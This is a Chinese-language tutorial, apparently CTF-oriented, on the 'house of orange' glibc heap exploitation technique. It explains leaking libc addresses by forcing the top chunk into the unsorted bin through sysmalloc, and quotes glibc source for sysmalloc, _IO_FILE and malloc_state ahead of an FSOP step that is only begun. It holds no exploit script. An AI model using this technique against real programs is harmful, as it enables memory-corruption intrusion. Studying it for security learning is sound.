不能释放堆空间,就很难泄露出我们想要的地址,但是 house of orange 可以解决此类问题,house of orange 由 地址泄露 + FSOP 两部分组成。
地址泄露
当我们申请一块内存时,malloc 函数会检查各种 bin 是否满足,都不满足条件之后会检查 top chunk ,如果此时 top chunk 也不能满足,就会调用 sysmalloc 来申请内存。
sysmalloc 会有两种处理方式,一种是直接 mmap 一块内存,另一种是拓展 top chunk(brk)
1 2 3 4 5 6 7 8 9 10 11
/* If have mmap, and the request size meets the mmap threshold, and the system supports mmap, and there are few enough currently allocated mmapped regions, try to directly map this request rather than expanding top. */ if ((unsignedlong) (nb) >= (unsignedlong) (mp_.mmap_threshold) && (mp_.n_mmaps < mp_.n_mmaps_max)) { char *mm; /* return value from mmap call*/ try_mmap:
old_top = av->top; old_size = chunksize (old_top); old_end = (char *) (chunk_at_offset (old_top, old_size)); brk = snd_brk = (char *) (MORECORE_FAILURE); /* If not the first time through, we require old_size to be at least MINSIZE and to have prev_inuse set. */ assert ((old_top == initial_top (av) && old_size == 0) || ((unsignedlong) (old_size) >= MINSIZE && prev_inuse (old_top) && ((unsignedlong) old_end & pagemask) == 0)); /* Precondition: not enough current space to satisfy nb request */ assert ((unsignedlong) (old_size) < (unsignedlong) (nb + MINSIZE));
满足上述四个条件后,继续执行就会触发 _int_free 把原来的 top chunk 给 free 掉,并放入 unsorted bin
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
top (av) = chunk_at_offset (heap, sizeof (*heap)); set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE); /* Setup fencepost and free the old top chunk with a multiple of MALLOC_ALIGNMENT in size. */ /* The fencepost takes at least MINSIZE bytes, because it might become the top chunk again later. Note that a footer is set up, too, although the chunk is marked in use. */ old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK; set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE); if (old_size >= MINSIZE) { set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE); set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ)); set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA); _int_free (av, old_top, 1);
此时我们已经得到了一个 unsorted bin ,当我们再次申请 unsorted bin 范围内的堆时,就会在 unsorted bin 中切割,同时也能泄露 libc 地址了。
struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags
/* The following pointers correspond to the C++ streambuf protocol. */ /* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */ char* _IO_read_ptr; /* Current read pointer */ char* _IO_read_end; /* End of get area. */ char* _IO_read_base; /* Start of putback+get area. */ char* _IO_write_base; /* Start of put area. */ char* _IO_write_ptr; /* Current put pointer. */ char* _IO_write_end; /* End of put area. */ char* _IO_buf_base; /* Start of reserve area. */ char* _IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ char *_IO_save_base; /* Pointer to start of non-current get area. */ char *_IO_backup_base; /* Pointer to first valid character of backup area */ char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno; #if 0 int _blksize; #else int _flags2; #endif _IO_off_t _old_offset; /* This used to be _offset but it's too small. */
#define __HAVE_COLUMN /* temporary */ /* 1+column number of pbase(); 0 is unknown. */ unsignedshort _cur_column; signedchar _vtable_offset; char _shortbuf[1];
/* char* _save_gptr; char* _save_egptr; */
_IO_lock_t *_lock; #ifdef _IO_USE_OLD_IO_FILE };
struct _IO_FILE_complete { struct _IO_FILE _file; #endif #if defined _G_IO_IO_FILE_VERSION && _G_IO_IO_FILE_VERSION == 0x20001 _IO_off64_t _offset; # if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T /* Wide character stream stuff. */ struct _IO_codecvt *_codecvt; struct _IO_wide_data *_wide_data; struct _IO_FILE *_freeres_list; void *_freeres_buf; # else void *__pad1; void *__pad2; void *__pad3; void *__pad4; # endif size_t __pad5; int _mode; /* Make sure we don't get into trouble again. */ char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)]; #endif };
/* Extra data for wide character streams. */ struct _IO_wide_data { wchar_t *_IO_read_ptr; /* Current read pointer */ wchar_t *_IO_read_end; /* End of get area. */ wchar_t *_IO_read_base; /* Start of putback+get area. */ wchar_t *_IO_write_base; /* Start of put area. */ wchar_t *_IO_write_ptr; /* Current put pointer. */ wchar_t *_IO_write_end; /* End of put area. */ wchar_t *_IO_buf_base; /* Start of reserve area. */ wchar_t *_IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */ wchar_t *_IO_backup_base; /* Pointer to first valid character of backup area */ wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */
structmalloc_state { /* Serialize access. */ mutex_t mutex; /* Flags (formerly in max_fast). */ int flags; /* Fastbins */ mfastbinptr fastbinsY[NFASTBINS]; /* Base of the topmost chunk -- not otherwise kept in a bin */ mchunkptr top; /* The remainder from the most recent split of a small request */ mchunkptr last_remainder; /* Normal bins packed as described above */ mchunkptr bins[NBINS * 2 - 2]; /* Bitmap of bins */ unsignedint binmap[BINMAPSIZE]; /* Linked list */ structmalloc_state *next; /* Linked list for free arenas. Access to this field is serialized by free_list_lock in arena.c. */ structmalloc_state *next_free; /* Number of threads attached to this arena. 0 if the arena is on the free list. Access to this field is serialized by free_list_lock in arena.c. */ INTERNAL_SIZE_T attached_threads; /* Memory allocated from the system in this arena. */ INTERNAL_SIZE_T system_mem; INTERNAL_SIZE_T max_system_mem; };